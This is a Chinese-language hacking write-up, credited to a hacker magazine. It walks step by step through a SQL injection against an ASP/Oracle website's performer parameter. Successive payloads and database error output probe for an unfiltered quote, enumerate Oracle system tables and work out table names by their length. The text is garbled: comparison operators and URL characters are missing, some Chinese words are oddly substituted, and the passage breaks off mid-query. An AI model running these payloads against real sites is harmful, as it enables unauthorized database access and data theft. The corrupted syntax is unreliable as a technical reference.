一次对ASP+ORACLE的注入手记





信息起源： 黑客防线
et.kpworld./star.aspperformer马三破;

OraOLEDB 错误
\'80040e14\' ORA00911:
invalid character
/star.asp，行83
阐明过滤了分,。
et.kpworld./star.aspperformer马三立\'

OraOLEDB 错误
\'80004005\' ORA01756:
括,内的字符串不正确停止
/star.asp，行83
看来存在未过滤单引,问题。
et.kpworld./star.aspperformer马三立\' and \'1\'\'1

闭跟他单引,，畸形返回。
and 0(select count(.) from admin) and \'1\'\'1

OraOLEDB 错误 \'80040e37\' ORA00942:
table or view does not exist
/star.asp，行83
解释不存在ADMIN这个表.
..................................................................
下面须要晓得ORACLE的系统表：
确定表中行的总数：
select num_rows from user_tables where table_name\'表名
寄存当前用户所有表
where table_name\'表名
\'selectcolumn_name,
from user_tab_columns 存放所有列
where table_name\'表名\'
and 0(select count(.) from all_tables) and \'1\'\'1

存在！
all_tables是一个系统表,用来存放当前ID和其余用户的所有表
and 0(select count(.) from user_tables) and \'1\'\'1

返回。有这个体系表，这个表存放当前用户的所有表
and 0(select top 1 table_name from user_tables) and \'1\'\'1

OraOLEDB 错误 \'80040e14\' ORA00923:
FROM keyword not found where expected
/star.asp，行83
不支持TOP 1 。。。。。。这种说明好象不太幻想。。。
(经由PINKEYES测试已经断定确切不支撑TOP 1)
and 0(select count(.) from user_tables where table_nam\'\')
and \'1\'\'1

OraOLEDB 错误 \'80040e14\' ORA00904:
invalid column name /star.asp，行83
当语法错误时,会显示无效列名字
and 0(select count(.) from user_tables where
table_name\'\'\'\') and \'1\'\'1

语法准确时，胜利返回标记,看来四个单引,表现空.接下来是对一些函数的测试：
and 0(select count(.) from user_tables where
sum(table_name) 1) and \'1\'\'1

OraOLEDB 毛病 \'80040e14\' ORA00934:
group function is not allowed here
/star.asp，行83
组函数不容许在这里。
and 0(select count(.) from user_tables where avg(table_name)) and
\'1\'\'1

OraOLEDB 错误 \'80040e14\' ORA00934:
group function is not allowed here
/star.asp，行83
组函数不许可在这里。
and 0(select to_char(table_name) from user_tables) and20\'1\'\'1

OraOLEDB 错误 \'80004005\' ORA01427:
singlerow subquery returns more
than one row
/star.asp，行83
单行的子查问返回多于一行
and 0(select count(.) from user_tables where table_name+1)
and20\'1\'\'1

OraOLEDB 过错 \'80040e14\' ORA00920:
invalid relational operator
/star.asp，行83
测试到这里，下面看看怎么弄出他的表来：
and 0(select count(.) from performer) and20\'1\'\'1

成功返回。这里的表是看前面URL猜的.
and 0(select count(.) from user_tables where
table_name\'performer\') and20\'1\'\'1

没返回。失败标志。
and200(select20count(.)20from20user_tables20where20table_name\'PERFORMER\')
and20\'1\'\'1

成功了！ 看来这个user_tables表只意识大写字母！
and 0(select count(.) from user_tables where
length(table_name) 10) and20\'1\'\'1

用length函数确定最长表的位数
and 0(select count(.) from user_tables where
length(table_name)18) and20\'1\'\'1

省略若干步骤，最后肯定最长表为18位。
and 0(select count(.) from user_tables where